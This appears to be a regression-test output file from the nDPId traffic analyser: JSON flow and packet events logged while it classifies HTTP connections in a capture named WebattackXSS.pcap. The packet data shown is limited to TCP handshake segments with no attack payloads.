+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347725355,"flow_last_seen":1499347730818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347726623,"flow_last_seen":1499347731818,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347854024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7383,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347855324,"flow_last_seen":1499347855324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347855324,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7383,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1499347855324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347855324,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82qpAAD4G6yWsEAABwKgKMoJ8AFBnHpBuAAAAAKACchCYqgAAAgQFtAQCCAoBPErEAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7384,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":2,"flow_last_seen":1499347855324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347855324,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgnxQBHT\/Zx6Qb6AScSC0ZwAAAgQFtAQCCAoD5hw4ATxKxAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7385,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":3,"flow_last_seen":1499347855325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347855325,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02qtAAD4G6yysEAABwKgKMoJ8AFBnHpBvUAR1AIAQAOVTbwAAAQEICgE8SsQD5hw4"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347856593,"flow_last_seen":1499347856593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347856593,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1499347856593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347856593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8fnJAAD4GR16sEAABwKgKMoKKAFBRAjJzAAAAAKACchALdwAAAgQFtAQCCAoBPEwBAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":2,"flow_last_seen":1499347856593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347856593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgooY0Yx1UQIydKAScSBFtAAAAgQFtAQCCAoD5h11ATxMAQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":3,"flow_last_seen":1499347856593,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347856593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0fnNAAD4GR2WsEAABwKgKMoKKAFBRAjJ0GNGMdoAQAOXkuwAAAQEICgE8TAED5h11"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7416,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347859192,"flow_last_seen":1499347859192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347859192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7416,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1499347859192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347859192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PBpAAD4GibasEAABwKgKMoKkAFB0dnKRAAAAAKACchClQAAAAgQFtAQCCAoBPE6LAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7417,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":2,"flow_last_seen":1499347859192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347859192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgqTwonDidHZykqAScSAgtQAAAgQFtAQCCAoD5h\/\/ATxOiwEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":3,"flow_last_seen":1499347859192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347859192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PBtAAD4Gib2sEAABwKgKMoKkAFB0dnKS8KJw44AQAOW\/vAAAAQEICgE8TosD5h\/\/"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347860489,"flow_last_seen":1499347860489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347860489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1499347860489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347860489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA842JAAD4G4m2sEAABwKgKMoKyAFDBtqytAAAAAKACchAckgAAAgQFtAQCCAoBPE\/PAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":2,"flow_last_seen":1499347860489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347860489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgrJy9x5\/wbasrqAScSBm0QAAAgQFtAQCCAoD5iFDATxPzwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7427,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":3,"flow_last_seen":1499347860490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347860490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA042NAAD4G4nSsEAABwKgKMoKyAFDBtqyucvcegIAQAOUF2QAAAQEICgE8T88D5iFD"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347861783,"flow_last_seen":1499347861783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347861783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1499347861783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347861783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lM1AAD4GMQOsEAABwKgKMoLAAFBG1cXfAAAAAKACchB88AAAAgQFtAQCCAoBPFESAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":2,"flow_last_seen":1499347861783,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347861783,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgsCSqnQ8RtXF4KAScSBQewAAAgQFtAQCCAoD5iKHATxREgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":3,"flow_last_seen":1499347861784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347861784,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lM5AAD4GMQqsEAABwKgKMoLAAFBG1cXgkqp0PYAQAOXvgQAAAQEICgE8URMD5iKH"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7449,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347863072,"flow_last_seen":1499347863072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347863072,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7449,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1499347863072,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347863072,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NydAAD4GjqmsEAABwKgKMoLOAFBzZGVyAAAAAKACchCvfQAAAgQFtAQCCAoBPFJVAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":2,"flow_last_seen":1499347863073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347863073,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgs7A+ay+c2Rlc6AScSAa9QAAAgQFtAQCCAoD5iPJATxSVQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":3,"flow_last_seen":1499347863073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347863073,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NyhAAD4GjrCsEAABwKgKMoLOAFBzZGVzwPmsv4AQAOW5\/AAAAQEICgE8UlUD5iPJ"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7458,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347864367,"flow_last_seen":1499347864367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7458,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1499347864367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347864367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SwNAAD4Ges2sEAABwKgKMoLcAFBKORibAAAAAKACchAkLwAAAgQFtAQCCAoBPFOYAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7459,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":2,"flow_last_seen":1499347864367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347864367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgtztJOKwSjkYnKAScSAsRQAAAgQFtAQCCAoD5iUNATxTmAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7461,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":3,"flow_last_seen":1499347864368,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347864368,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SwRAAD4GetSsEAABwKgKMoLcAFBKORic7STisYAQAOXLSwAAAQEICgE8U5kD5iUN"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347729211,"flow_last_seen":1499347734819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347730501,"flow_last_seen":1499347735819,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 